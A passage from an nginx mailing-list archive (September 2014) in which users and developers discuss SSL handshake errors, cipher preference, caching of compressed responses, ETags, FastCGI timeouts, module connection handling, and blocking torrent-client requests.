From nginx-forum at nginx.us Mon Sep 1 06:20:05 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 02:20:05 -0400 Subject: Significant increase in number of connections after renewing SSL certificate Message-ID: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> Hello. We recently renewed our SSL certificate. After reloading nginx the number of connections increased significantly even if the number of requests remained the same. Trying out the debug log there are a lot of entries similar to the following: accept: 153.185.223.172:59011 fd:5 event timer add: 5: 60000:1409550689995 reusable connection: 1 epoll add event: fd:5 op:1 ev:80002001 post event 00007FF5AB84F280 delete posted event 00007FF5AB84F280 http check ssl handshake http recv(): 1 https ssl handshake: 0x80 SSL_do_handshake: -1 SSL_get_error: 2 reusable connection: 0 post event 00007FF5AB84F280 delete posted event 00007FF5AB84F280 SSL handshake handler: 0 SSL_do_handshake: 0 SSL_get_error: 1 SSL_do_handshake() failed (SSL: error:1409441B:SSL routines:SSL3_READ_BYTES:tlsv1 alert decrypt error:SSL alert number 51) while SSL handshaking, client: 153.185.223.172, server: 0.0.0.0:443 close http connection: 5 SSL_shutdown: 1 event timer del: 5: 1409550689995 reusable connection: 0 free: 0000000001DE0DF0, unused: 0 free: 0000000001E15510, unused: 136 Our SSL certificate is a Positive SSL Wildcard from Comodo. Output of nginx -V: nginx version: openresty/1.7.2.1 built by gcc 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) TLS SNI support enabled configure arguments: --prefix=/usr/local/openresty/nginx --with-debug --with-cc-opt='-DNGX_LUA_USE_ASSERT -DNGX_LUA_ABORT_AT_PANIC' --add-module=../ngx_devel_kit-0.2.19 --add-module=../echo-nginx-module-0.54 --add-module=../xss-nginx-module-0.04 --add-module=../ngx_coolkit-0.2rc1 --add-module=../set-misc-nginx-module-0.24 --add-module=../form-input-nginx-module-0.09 --add-module=../encrypted-session-nginx-module-0.03 --add-module=../srcache-nginx-module-0.28 --add-module=../ngx_lua-0.9.10 --add-module=../ngx_lua_upstream-0.02 --add-module=../headers-more-nginx-module-0.25 --add-module=../array-var-nginx-module-0.03 --add-module=../memc-nginx-module-0.15 --add-module=../redis2-nginx-module-0.11 --add-module=../redis-nginx-module-0.3.7 --add-module=../rds-json-nginx-module-0.13 --add-module=../rds-csv-nginx-module-0.05 --with-ld-opt=-Wl,-rpath,/usr/local/openresty/luajit/lib --with-http_stub_status_module --with-http_ssl_module Link to the debug log, with some lines removed for privacy: http://goo.gl/xsJfNz. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252972#msg-252972 From luky-37 at hotmail.com Mon Sep 1 06:39:43 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Mon, 1 Sep 2014 08:39:43 +0200 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> References: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > Hello. We recently renewed our SSL certificate. After reloading nginx the > number of connections increased significantly even if the number of requests > remained the same. Does ssltest [1] show any chain issues? Any other warnings from that report? Regards, Lukas [1] https://www.ssllabs.com/ssltest/ From nginx-forum at nginx.us Mon Sep 1 07:04:56 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:04:56 -0400 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: References: Message-ID: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Hello. No, our site's grade is A. Our server is still processing requests correctly, so some of the requests succeed but most have an SSL error. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252974#msg-252974 From luky-37 at hotmail.com Mon Sep 1 07:10:51 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Mon, 1 Sep 2014 09:10:51 +0200 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> References: , <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Message-ID: > Hello. > > No, our site's grade is A. Grade is irrelevant. Does it have chain issues or not (read: does ssltest report "chain issues: none")? From nginx-forum at nginx.us Mon Sep 1 07:11:26 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:11:26 -0400 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> References: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Message-ID: <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> To add more information, we have the chain issue "Chain issues: Contains anchor". But removing it does not help. Some more details: https://prtsc.io/g4QVsY3PUY https://prtsc.io/FmMCjDao4p https://prtsc.io/WZksyPXucM Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252975#msg-252975 From dewanggaba at xtremenitro.org Mon Sep 1 07:14:54 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Mon, 01 Sep 2014 14:14:54 +0700 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> References: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> Message-ID: <54041CEE.2050209@xtremenitro.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, What kind of ciphers do you use? Could you paste your ciphers configuration there? On 9/1/2014 14:11, lpugoy wrote: > To add more information, we have the chain issue "Chain issues: > Contains anchor". But removing it does not help. > > Some more details: https://prtsc.io/g4QVsY3PUY > https://prtsc.io/FmMCjDao4p https://prtsc.io/WZksyPXucM > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,252972,252975#msg-252975 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.17 (MingW32) iQEcBAEBAgAGBQJUBBztAAoJEF1+odKB6YIxbO8H/iZ0USYpY8JACU2ZofHRTLf0 DOyODVmJViWP8vGzloDTlHbKxIBB8JBtFwTQcqfaGLDO8/GlS1HmW1FqZLDgrMSO 7Xd5VyuVjaGGbCuB06+3USWJw+Ge4Xg9ZE+KgD8Vt5pbkZy0VtUZCJKhzJXMEYuZ AThRy33tMuJfUF9zMwdqYMY/zbdtWJnkqOWqMptp/7x+zWG97B+Il9MrQIbjcnyb VsTJiMNOsD5q9N+8Uiozy3RKngxI5rnEWuRnFoloHdoP1ipOyUIM09A/OxFetHWA lp9rtihR8FCJB/BikpwHcMFzXGx/Q1x9Z9CJkgwrUEAB7jicaZODVHjtqi1G1xc= =hFo0 -----END PGP SIGNATURE----- From nginx-forum at nginx.us Mon Sep 1 07:20:10 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:20:10 -0400 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <54041CEE.2050209@xtremenitro.org> References: <54041CEE.2050209@xtremenitro.org> Message-ID: > What kind of ciphers do you use? Could you paste your ciphers > configuration there? ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_prefer_server_ciphers on; ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS"; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252978#msg-252978 From nginx-forum at nginx.us Mon Sep 1 07:20:23 2014 From: nginx-forum at nginx.us (nginxsantos) Date: Mon, 01 Sep 2014 03:20:23 -0400 Subject: Compression with Caching In-Reply-To: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> Message-ID: Any thoughts on this? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252885,252979#msg-252979 From mdounin at mdounin.ru Mon Sep 1 09:41:32 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Sep 2014 13:41:32 +0400 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140901094132.GU1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 03:20:23AM -0400, nginxsantos wrote: > Any thoughts on this? As you already found out, nginx stores responses as got from the backend server. If you want to store compressed responses - they have to be returned compressed by the upstream. If your upstream server doesn't do this - you can add an additional proxy layer (e.g., in the same nginx instance) to do this. Note though, that if you'll store compressed responses in the cache, you'll have to take care of uncompressing them as appropriate for clients which doesn't support compression (gunzip module can do this, see http://nginx.org/r/gunzip). -- Maxim Dounin http://nginx.org/ From braulio at eita.org.br Mon Sep 1 12:06:40 2014 From: braulio at eita.org.br (=?UTF-8?Q?Br=C3=A1ulio_Bhavamitra?=) Date: Mon, 1 Sep 2014 09:06:40 -0300 Subject: Compression with Caching In-Reply-To: <20140901094132.GU1849@mdounin.ru> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: Maxim, is there is roadmap for ETags? I really miss that on nginx... On Mon, Sep 1, 2014 at 6:41 AM, Maxim Dounin wrote: > Hello! > > On Mon, Sep 01, 2014 at 03:20:23AM -0400, nginxsantos wrote: > > > Any thoughts on this? > > As you already found out, nginx stores responses as got from the > backend server. If you want to store compressed responses - they > have to be returned compressed by the upstream. If your upstream > server doesn't do this - you can add an additional proxy layer > (e.g., in the same nginx instance) to do this. > > Note though, that if you'll store compressed responses in the > cache, you'll have to take care of uncompressing them as > appropriate for clients which doesn't support compression (gunzip > module can do this, see http://nginx.org/r/gunzip). > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua ideologia. Morra por sua ideologia" P.R. Sarkar EITA - Educa??o, Informa??o e Tecnologias para Autogest?o http://cirandas.net/brauliobo http://eita.org.br "Paramapurusha ? meu pai e Parama Prakriti ? minha m?e. O universo ? meu lar e todos n?s somos cidad?os deste cosmo. Este universo ? a imagina??o da Mente Macroc?smica, e todas as entidades est?o sendo criadas, preservadas e destru?das nas fases de extrovers?o e introvers?o do fluxo imaginativo c?smico. No ?mbito pessoal, quando uma pessoa imagina algo em sua mente, naquele momento, essa pessoa ? a ?nica propriet?ria daquilo que ela imagina, e ningu?m mais. Quando um ser humano criado mentalmente caminha por um milharal tamb?m imaginado, a pessoa imaginada n?o ? a propriedade desse milharal, pois ele pertence ao indiv?duo que o est? imaginando. Este universo foi criado na imagina??o de Brahma, a Entidade Suprema, por isso a propriedade deste universo ? de Brahma, e n?o dos microcosmos que tamb?m foram criados pela imagina??o de Brahma. Nenhuma propriedade deste mundo, mut?vel ou imut?vel, pertence a um indiv?duo em particular; tudo ? o patrim?nio comum de todos." Restante do texto em http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Mon Sep 1 12:18:18 2014 From: r at roze.lv (Reinis Rozitis) Date: Mon, 1 Sep 2014 15:18:18 +0300 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: > is there is roadmap for ETags? I really miss that on nginx... What do you mean by that? http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by default since 1.3.3. rr From patrick at laimbock.com Mon Sep 1 12:24:19 2014 From: patrick at laimbock.com (Patrick Laimbock) Date: Mon, 01 Sep 2014 14:24:19 +0200 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: <54046573.6080402@laimbock.com> On 01-09-14 14:18, Reinis Rozitis wrote: >> is there is roadmap for ETags? I really miss that on nginx... > > What do you mean by that? > > http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by > default since 1.3.3. And from http://nginx.org/en/CHANGES Changes with nginx 1.7.3 08 Jul 2014 *) Feature: weak entity tags are now preserved on response modifications, and strong ones are changed to weak. HTH, Patrick From braulio at eita.org.br Mon Sep 1 12:33:42 2014 From: braulio at eita.org.br (=?UTF-8?Q?Br=C3=A1ulio_Bhavamitra?=) Date: Mon, 1 Sep 2014 09:33:42 -0300 Subject: Compression with Caching In-Reply-To: <54046573.6080402@laimbock.com> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> <54046573.6080402@laimbock.com> Message-ID: Thanks Patrick, I meant weak etags, happy to see them on 1.7.3! On Mon, Sep 1, 2014 at 9:24 AM, Patrick Laimbock wrote: > On 01-09-14 14:18, Reinis Rozitis wrote: > >> is there is roadmap for ETags? I really miss that on nginx... >>> >> >> What do you mean by that? >> >> http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by >> default since 1.3.3. >> > > And from http://nginx.org/en/CHANGES > > Changes with nginx 1.7.3 08 Jul 2014 > > *) Feature: weak entity tags are now preserved on response > modifications, and strong ones are changed to weak. > > > HTH, > Patrick > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua ideologia. Morra por sua ideologia" P.R. Sarkar EITA - Educa??o, Informa??o e Tecnologias para Autogest?o http://cirandas.net/brauliobo http://eita.org.br "Paramapurusha ? meu pai e Parama Prakriti ? minha m?e. O universo ? meu lar e todos n?s somos cidad?os deste cosmo. Este universo ? a imagina??o da Mente Macroc?smica, e todas as entidades est?o sendo criadas, preservadas e destru?das nas fases de extrovers?o e introvers?o do fluxo imaginativo c?smico. No ?mbito pessoal, quando uma pessoa imagina algo em sua mente, naquele momento, essa pessoa ? a ?nica propriet?ria daquilo que ela imagina, e ningu?m mais. Quando um ser humano criado mentalmente caminha por um milharal tamb?m imaginado, a pessoa imaginada n?o ? a propriedade desse milharal, pois ele pertence ao indiv?duo que o est? imaginando. Este universo foi criado na imagina??o de Brahma, a Entidade Suprema, por isso a propriedade deste universo ? de Brahma, e n?o dos microcosmos que tamb?m foram criados pela imagina??o de Brahma. Nenhuma propriedade deste mundo, mut?vel ou imut?vel, pertence a um indiv?duo em particular; tudo ? o patrim?nio comum de todos." Restante do texto em http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Mon Sep 1 14:56:00 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 1 Sep 2014 16:56:00 +0200 Subject: SSL ciphers preference Message-ID: Hello, I filled a (now closed, because erroneous) enhancement ticket: http://trac.nginx.org/nginx/ticket/619 As it appears, the change I noticed in the SSl test did not result from my malformed ciphers list. Right about that. However, what is intriguing is the answer Maxim gave me on the second part of my proposal: the default activation of ssl_prefer_server_ciphers . He saif that this option put to on made sense with a custome list but not with the default one. I confirm that the results of my tests changed. It was no because of the ciphers list, but it was due to that other change. Thus, the ciphers used by the emulated clients of the test changed following the activation of that option, allowing me to pass the 'Forward Secrecy' part of the test, resulting in an upgrade of my score from A- to A. I jsut checked it again, removing my buggy ciphers list and (de)activating de rprefer' option. If using that option with the default ciphers list was useless, what had that change an impact on the results of my test? --- *B. R.* -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 1 18:05:46 2014 From: nginx-forum at nginx.us (manish-ezest) Date: Mon, 01 Sep 2014 14:05:46 -0400 Subject: NGINX redirection issue In-Reply-To: <20140831024541.GS1849@mdounin.ru> References: <20140831024541.GS1849@mdounin.ru> Message-ID: Hello Maxim, Like you suggested I have set "recursive_error_pages" to off but still I am facing the problem. This time I am getting "504 Gateway Time-out" error. I have already shared my NGINX and vhost configuration. We have one fastcgi script running for serving error pages which checks the entry of sample.xml(contains url) file and redirect the link to particular location. If it doesn't find any page then it returns a 404 page. I am pasting the log file of fastcgi script as well. ==> fastcgi-404.log <== [2014-09-01T15:45:24] Got request for [/bbb/ccc/index.html] on host [www.aaa.com] [2014-09-01T15:45:24] Target not found in sample.xml, importing default 404 [/bbb/fff/error_404.html] [2014-09-01T15:45:24] Retrieving target [http://www.aaa.com/bbb/fff/error_404.html] ==> www.aaa.com-error.log <== 2014/09/01 15:45:34 [error] 15900#0: *175 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /bbb/ccc/index.html HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" 2014/09/01 15:45:34 [error] 15900#0: *175 open() "/www/favicon.ico" failed (2: No such file or directory), client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", host: "www.aaa.com" 2014/09/01 15:45:44 [error] 15900#0: *175 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" 2014/09/01 15:46:57 [error] 15900#0: *178 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /bbb/ccc/index.html HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" 2014/09/01 15:46:57 [error] 15900#0: *178 open() "/www/favicon.ico" failed (2: No such file or directory), client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", host: "www.aaa.com" 2014/09/01 15:47:07 [error] 15900#0: *178 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" --Manish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252379,252998#msg-252998 From mdounin at mdounin.ru Mon Sep 1 18:07:29 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Sep 2014 22:07:29 +0400 Subject: SSL ciphers preference In-Reply-To: References: Message-ID: <20140901180729.GD1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 04:56:00PM +0200, B.R. wrote: > Hello, > > I filled a (now closed, because erroneous) enhancement ticket: > http://trac.nginx.org/nginx/ticket/619 > > As it appears, the change I noticed in the SSl test did not result from my > malformed ciphers list. > Right about that. > > However, what is intriguing is the answer Maxim gave me on the second part > of my proposal: the default activation of ssl_prefer_server_ciphers > > . > > He saif that this option put to on made sense with a custome list but not > with the default one. > > I confirm that the results of my tests changed. It was no because of the > ciphers list, but it was due to that other change. > Thus, the ciphers used by the emulated clients of the test changed > following the activation of that option, allowing me to pass the 'Forward > Secrecy' part of the test, resulting in an upgrade of my score from A- to A. > > I jsut checked it again, removing my buggy ciphers list and (de)activating > de rprefer' option. > > If using that option with the default ciphers list was useless, what had > that change an impact on the results of my test? Switching on or off ssl_prefer_server_ciphers obviously may change score as reported by SSL Labs, since it can (and likely will) change ciphers negotiated in some cases. But it's usually not a good idea to switch it on unless you understand the results and have a good reason to do so. By default, OpenSSL sorts ciphers per symmetric encryption strength, and prefers ciphers with forward secrecy if strength is identical. As a result you may get better forward secrecy support if you'll switch on ssl_prefer_server_ciphers - or not, depending on actual ciphers supported by clients. E.g., AES256-SHA will be preferred over ECDHE-RSA-AES128-SHA, which is probably not what you want. Another example: DHE-RSA-AES256-SHA256 will be preferred over ECDHE-RSA-AES128-SHA256. On the other hand, you probably don't want DHE to be used at all for performance reasons. -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Mon Sep 1 18:35:10 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 1 Sep 2014 20:35:10 +0200 Subject: SSL ciphers preference In-Reply-To: <20140901180729.GD1849@mdounin.ru> References: <20140901180729.GD1849@mdounin.ru> Message-ID: Loud and clear. I am no expert at OpenSSL cypher suites. I found that resource that might prove useful on their own website. At least, that is a start to understand what you are doing... Thanks! --- *B. R.* On Mon, Sep 1, 2014 at 8:07 PM, Maxim Dounin wrote: > Hello! > > On Mon, Sep 01, 2014 at 04:56:00PM +0200, B.R. wrote: > > > Hello, > > > > I filled a (now closed, because erroneous) enhancement ticket: > > http://trac.nginx.org/nginx/ticket/619 > > > > As it appears, the change I noticed in the SSl test did not result from > my > > malformed ciphers list. > > Right about that. > > > > However, what is intriguing is the answer Maxim gave me on the second > part > > of my proposal: the default activation of ssl_prefer_server_ciphers > > < > http://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_prefer_server_ciphers > > > > . > > > > He saif that this option put to on made sense with a custome list but not > > with the default one. > > > > I confirm that the results of my tests changed. It was no because of the > > ciphers list, but it was due to that other change. > > Thus, the ciphers used by the emulated clients of the test changed > > following the activation of that option, allowing me to pass the 'Forward > > Secrecy' part of the test, resulting in an upgrade of my score from A- > to A. > > > > I jsut checked it again, removing my buggy ciphers list and > (de)activating > > de rprefer' option. > > > > If using that option with the default ciphers list was useless, what had > > that change an impact on the results of my test? > > Switching on or off ssl_prefer_server_ciphers obviously may change > score as reported by SSL Labs, since it can (and likely will) > change ciphers negotiated in some cases. But it's usually not > a good idea to switch it on unless you understand the results and > have a good reason to do so. > > By default, OpenSSL sorts ciphers per symmetric encryption > strength, and prefers ciphers with forward secrecy if strength is > identical. As a result you may get better forward secrecy support > if you'll switch on ssl_prefer_server_ciphers - or not, depending > on actual ciphers supported by clients. E.g., AES256-SHA will be > preferred over ECDHE-RSA-AES128-SHA, which is probably not what > you want. > > Another example: DHE-RSA-AES256-SHA256 will be preferred over > ECDHE-RSA-AES128-SHA256. On the other hand, you probably > don't want DHE to be used at all for performance reasons. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 1 21:25:56 2014 From: nginx-forum at nginx.us (erankor2) Date: Mon, 01 Sep 2014 17:25:56 -0400 Subject: terminate a connection after sending headers Message-ID: Hi all, In the module I'm developing, I have the possibility of encountering an error after the response headers were already sent. As the headers were already sent (with status 200) the only way for me to signal the error to the client would be to close the connection. I tried calling ngx_http_finalize_request with both NGX_ERROR and NGX_HTTP_CLOSE and the connection is not closed. After debugging it, I found it has to do with the 'if (mr->write_event_handler)' in ngx_http_terminate_request. I'm not sure what is the purpose of this if, but in my case write_event_handler has the value ngx_http_request_empty_handler, so the if evaluates to true and the connection is not terminated. When I forcefully change write_event_handler to NULL with GDB, I see the connection is closed as expected. I searched the code for 'write_event_handler =' and could not find a single place where this member gets a value of NULL (it always gets a pointer to some function). Can anyone confirm if this is really a bug ? maybe the if should be updated to 'if (mr->write_event_handler != ngx_http_request_empty_handler)' ? Thank you, Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253006#msg-253006 From nginx-forum at nginx.us Tue Sep 2 07:12:11 2014 From: nginx-forum at nginx.us (nginxsantos) Date: Tue, 02 Sep 2014 03:12:11 -0400 Subject: Compression with Caching In-Reply-To: <20140901094132.GU1849@mdounin.ru> References: <20140901094132.GU1849@mdounin.ru> Message-ID: <8f64898850349e84fd7d4cc12b589e54.NginxMailingListEnglish@forum.nginx.org> Thanks.... I am not sure why we don't first compress and then store the same in the cache. In this way, we don't have to compress the content each time (if the client is asking for a gzipped content) before sending to client. I am not able to understand why it is currently designed thisway, Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252885,253009#msg-253009 From nginx-forum at nginx.us Tue Sep 2 08:59:05 2014 From: nginx-forum at nginx.us (laszlo) Date: Tue, 02 Sep 2014 04:59:05 -0400 Subject: redirect only every 2nd or 3rd request Message-ID: <3f758f688a1c9e13f7c769a6d981774a.NginxMailingListEnglish@forum.nginx.org> I'm trying to set up a rule which is going to redirect only every second or third request only if the URL contains a specific string. I did already the redirect based on a string in the URL but I can't find how to redirect only every second on third request: if ($request_uri ~ .*.WHATEVER_STRING.*) { if (this is the 2nd request than) { rewrite ^/(.*) WHATEVER_URL; } } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253011,253011#msg-253011 From nginx-forum at nginx.us Tue Sep 2 10:16:42 2014 From: nginx-forum at nginx.us (gthb) Date: Tue, 02 Sep 2014 06:16:42 -0400 Subject: Hide a request cookie in proxy_pass In-Reply-To: <20140829172725.GQ1849@mdounin.ru> References: <20140829172725.GQ1849@mdounin.ru> Message-ID: Yep, works like a charm, thank you! And two consecutive ifs to strip two cookies works as well: set $stripped_cookie $http_cookie; if ($http_cookie ~ "(.*)(?:^|;)\s*sessionid=[^;]+(.*)$") { set $stripped_cookie $1$2; } if ($stripped_cookie ~ "(.*)(?:^|;)\s*csrftoken=[^;]+(.*)$") { set $stripped_cookie $1$2; } Cheers, Gulli Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252944,253012#msg-253012 From neutrino8 at gmail.com Tue Sep 2 11:08:03 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 13:08:03 +0200 Subject: Deny certain words Message-ID: Hi, Somehow my server gets hit by torrent requests which look like this: GET /?info_hash=..... after the = come long strings of seemingly random hashes torrent clients are looking for. I'd like to deny all such requests so would like if someone could provide me how to deny everything (and including) ?info_hash= I've looked all over the net at similar examples but all I tried thus far didn't work Thanks :) -- Yours truly From lists-nginx at swsystem.co.uk Tue Sep 2 11:17:12 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Tue, 02 Sep 2014 12:17:12 +0100 Subject: Deny certain words In-Reply-To: References: Message-ID: Torrent clients have their own user agent normally, I had a need a while back to block some which we used the magic 444 to kill it. if ($http_user_agent ~* (uTorrent|Transmission) ) { return 444; break; } On 02/09/2014 12:08, Grozdan wrote: > Hi, > > Somehow my server gets hit by torrent requests which look like this: > > GET /?info_hash=..... > > after the = come long strings of seemingly random hashes torrent > clients are looking for. > > I'd like to deny all such requests so would like if someone could > provide me how to deny everything (and including) ?info_hash= > > I've looked all over the net at similar examples but all I tried thus > far didn't work > > Thanks :) From neutrino8 at gmail.com Tue Sep 2 11:32:51 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 13:32:51 +0200 Subject: Deny certain words In-Reply-To: References: Message-ID: On Tue, Sep 2, 2014 at 1:17 PM, Steve Wilson wrote: > Torrent clients have their own user agent normally, I had a need a while > back to block some which we used the magic 444 to kill it. > > if ($http_user_agent ~* (uTorrent|Transmission) ) { > return 444; > break; > > } Thanks. That seems to work here :) > > On 02/09/2014 12:08, Grozdan wrote: >> >> Hi, >> >> Somehow my server gets hit by torrent requests which look like this: >> >> GET /?info_hash=..... >> >> after the = come long strings of seemingly random hashes torrent >> clients are looking for. >> >> I'd like to deny all such requests so would like if someone could >> provide me how to deny everything (and including) ?info_hash= >> >> I've looked all over the net at similar examples but all I tried thus >> far didn't work >> >> Thanks :) > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From mdounin at mdounin.ru Tue Sep 2 13:09:03 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:09:03 +0400 Subject: terminate a connection after sending headers In-Reply-To: References: Message-ID: <20140902130903.GI1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 05:25:56PM -0400, erankor2 wrote: > Hi all, > > In the module I'm developing, I have the possibility of encountering an > error after the response headers were already sent. As the headers were > already sent (with status 200) the only way for me to signal the error to > the client would be to close the connection. I tried calling > ngx_http_finalize_request with both NGX_ERROR and NGX_HTTP_CLOSE and the > connection is not closed. > After debugging it, I found it has to do with the 'if > (mr->write_event_handler)' in ngx_http_terminate_request. I'm not sure what > is the purpose of this if, but in my case write_event_handler has the value > ngx_http_request_empty_handler, so the if evaluates to true and the > connection is not terminated. When I forcefully change write_event_handler > to NULL with GDB, I see the connection is closed as expected. > I searched the code for 'write_event_handler =' and could not find a single > place where this member gets a value of NULL (it always gets a pointer to > some function). The r->write_event_handler is set to NULL on initial creation of a request. If write_event_handler is not NULL during a request termination, nginx posts an event instead of freeing the request request directly (this is done to avoid use-after-free when processing posted subrequests). The request is still freed though. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 13:09:55 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:09:55 +0400 Subject: Deny certain words In-Reply-To: References: Message-ID: <20140902130955.GJ1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson wrote: > Torrent clients have their own user agent normally, I had a need a while > back to block some which we used the magic 444 to kill it. > > if ($http_user_agent ~* (uTorrent|Transmission) ) { > return 444; > break; > } Just a note: you don't need "break" here. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 13:58:50 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:58:50 +0400 Subject: NGINX redirection issue In-Reply-To: References: <20140831024541.GS1849@mdounin.ru> Message-ID: <20140902135850.GL1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 02:05:46PM -0400, manish-ezest wrote: > 